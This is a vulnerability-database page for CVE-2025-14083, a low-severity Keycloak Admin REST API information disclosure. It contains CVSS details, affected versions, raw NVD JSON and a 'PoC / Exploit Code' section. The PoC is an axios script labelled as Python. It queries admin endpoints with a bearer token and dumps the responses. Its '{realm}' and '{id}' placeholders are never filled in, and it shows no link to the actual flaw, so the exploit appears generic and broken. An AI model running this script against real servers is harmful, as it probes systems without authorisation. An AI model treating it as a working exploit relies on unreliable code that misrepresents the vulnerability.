Security Vulnerability Report
中文
CVE-2025-14083 CVSS 2.7 LOW

CVE-2025-14083

Published: 2026-01-21 13:16:03
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A flaw was found in the Keycloak Admin REST API. This vulnerability allows the exposure of backend schema and rules, potentially leading to targeted attacks or privilege escalation via improper access control.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Keycloak < 24.0.5
Keycloak < 23.0.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-14083 PoC - Keycloak Admin REST API Schema Information Disclosure // Requires high privileges (admin role) const axios = require('axios'); async function exploitCVE202514083(baseUrl, accessToken) { console.log('[+] Exploiting CVE-2025-14083: Keycloak Admin REST API Information Disclosure'); // Target endpoints that may expose backend schema const targets = [ '/admin/realms/{realm}/client-resources/schemas', '/admin/realms/{realm}/server-info', '/admin/realms/{realm}/components', '/admin/realms/{realm}/roles-by-id/{id}' ]; for (const endpoint of targets) { try { const response = await axios.get(`${baseUrl}${endpoint}`, { headers: { 'Authorization': `Bearer ${accessToken}`, 'Content-Type': 'application/json' }, timeout: 10000 }); if (response.status === 200) { console.log(`[+] Discovered schema info at: ${endpoint}`); console.log('Response data:', JSON.stringify(response.data, null, 2)); } } catch (error) { console.log(`[-] Failed to access ${endpoint}: ${error.message}`); } } } // Usage example // const target = 'https://keycloak.example.com'; // const token = 'admin-access-token'; // exploitCVE202514083(target, token);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14083", "sourceIdentifier": "[email protected]", "published": "2026-01-21T13:16:02.777", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in the Keycloak Admin REST API. This vulnerability allows the exposure of backend schema and rules, potentially leading to targeted attacks or privilege escalation via improper access control."}, {"lang": "es", "value": "Se encontró una falla en la API REST de administración de Keycloak. Esta vulnerabilidad permite la exposición del esquema y las reglas del backend, lo que podría conducir a ataques dirigidos o a una escalada de privilegios mediante un control de acceso inadecuado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:6477", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:6478", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-14083", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2419086", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.